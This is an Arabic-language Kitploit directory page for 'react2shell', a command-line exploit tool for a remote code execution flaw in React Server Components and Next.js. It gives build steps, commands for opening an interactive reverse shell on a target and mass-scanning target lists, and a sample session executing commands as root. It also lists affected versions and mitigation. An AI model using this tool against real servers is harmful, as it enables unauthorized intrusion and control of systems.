Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react2shell — أداة سطر أوامر تستغل الثغرات في React Server Components وServer Actions (CVE-2025-55182, CVE-2025-66478) لتحقيق تنفيذ الأوامر عن بُعد (RCE) على الخوادم الضعيفة. | Kitploit
أدوات/GitHubGitHub/mantvmass/react2shell
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدArchived
GitHubmantvmass/react2shell

react2shell

أداة سطر أوامر تستغل الثغرات في React Server Components وServer Actions (CVE-2025-55182, CVE-2025-66478) لتحقيق تنفيذ الأوامر عن بُعد (RCE) على الخوادم الضعيفة.

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

React2Shell

أداة CLI لاستغلال ثغرات تلوث النموذج الأولي في React Server Components / Server Actions (CVE-2025-55182 & CVE-2025-66478)، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) على الخوادم الضعيفة.

الإثبات الأصلي (PoC) : https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

تحذير: هذه الأداة تستهدف ثغرة حرجة (CVSS 10.0) يتم استغلالها بنشاط في البيئة الحقيقية. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

إخلاء مسؤولية قانوني

هذه الأداة مخصصة فقط للأغراض التعليمية، واختبارات الأمان المصرح بها، واختبارات الاختراق بإذن، وأبحاث الثغرات.

المؤلف والمساهمون لا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر أو عواقب قانونية ناتجة عن استخدام هذه الأداة. أنت مسؤول بالكامل عن ضمان امتثال استخدامك لجميع القوانين واللوائح وشروط الخدمة المعمول بها.

الاستخدام غير المصرح به ضد الأنظمة دون إذن غير قانوني في معظم الولايات القضائية وقد يؤدي إلى عقوبات شديدة.

التثبيت

من المصدر

root@kitploit:~
git clone https://github.com/mantvmass/react2shell.git
cd react2shell
cargo build --release

سيكون الملف الثنائي في target/release/react2shell (أو react2shell.exe على ويندوز).

الملفات الثنائية المجمعة مسبقاً

قم بالتحميل من صفحة الإصدارات.

الاستخدام

root@kitploit:~
react2shell [COMMAND] [SOURCE]

الأوامر

  • open <URL>: فتح شل عكسية تفاعلية على الهدف (إذا كان ضعيفاً).
  • scan <FILE>: فحص قائمة أهداف من ملف (رابط واحد لكل سطر) بحثاً عن الثغرة.

أمثلة

root@kitploit:~
# فتح شل تفاعلية
react2shell open http://vulnerable-target.com

# فحص أهداف متعددة
react2shell scan targets.txt

# فحص هدف واحد
react2shell scan http://127.0.0.1:3000

أمثلة على الشل التفاعلية

root@kitploit:~
[email protected]:3000 (js)
$ /help                                                    # عرض جميع الأوامر المدعومة
Commands;
  /new <URL> ; تبديل رابط الهدف                           # تبديل رابط الهدف
  /use exec ; تنفيذ الأمر وانتظار الناتج                  # التبديل إلى وضع exec (ينتظر النتيجة)
  /use exec-no-wait ; تنفيذ الأمر دون انتظار              # وضع exec دون انتظار الناتج
  /use js ; تنفيذ كود JavaScript                          # العودة إلى وضع JavaScript
  /set timeout <ms> ; تعيين مهلة الأمر بالميلي ثانية      # تكوين مهلة الأمر
  /show options ; عرض الإعدادات الحالية                   # عرض إعدادات الشل الحالية
  /clear ; مسح الشاشة                                      # مسح شاشة الطرفية
  /exit or /quit ; الخروج من الشل                          # الخروج من الشل التفاعلية

Examples;
  ls -la                                                 # مثال لأمر لينكس
  whoami                                                 # عرض مستخدم النظام الحالي
  console.log('Hello')                                   # مثال لأمر JavaScript

[email protected]:3000 (js)
$ /use exec                                              # التبديل من وضع JS إلى وضع exec
[+] Switch shell mode to exec

[email protected]:3000 (exec)
$ whoami                                                 # التحقق من المستخدم المنفذ الحالي
root                                                     # ناتج الأمر

الإصدارات المتأثرة

Next.js

التطبيقات التي تستخدم React Server Components مع App Router تكون متأثرة عند تشغيل الإصدارات التالية:

  • Next.js 15.x
  • Next.js 16.x
  • Next.js 14.3.0-canary.77 والإصدارات الكناري الأحدث

ما يلي غير متأثر:

  • Next.js 13.x
  • Next.js 14.x (الإصدارات المستقرة)
  • التطبيقات التي تستخدم Pages Router
  • عمليات نشر Edge Runtime

React

الثغرة موجودة في إصدارات React 19.0, 19.1.0, 19.1.1, و 19.2.0 ضمن الحزم التالية:

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack

يوصى بشدة بالترقية الفورية إلى الإصدارات المصححة، خاصةً لبيئات الإنتاج.

التخفيف

الإصلاح الأساسي هو الترقية إلى الإصدارات المصححة من React و Next.js.

لتطبيقات Next.js، استخدم أداة الإصلاح الآلي الرسمية:

root@kitploit:~
npx fix-react2shell-next

مزيد من المعلومات: vercel-labs/fix-react2shell-next

انظر الإعلانات الرسمية:

  • React: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • Next.js: https://nextjs.org/blog/CVE-2025-66478

الترخيص

تم إصدار هذا المشروع للأغراض التعليمية وأبحاث الأمن المصرح بها فقط. تقع المسؤولية الكاملة للاستخدام على عاتق المستخدم النهائي.

تنزيل الأداة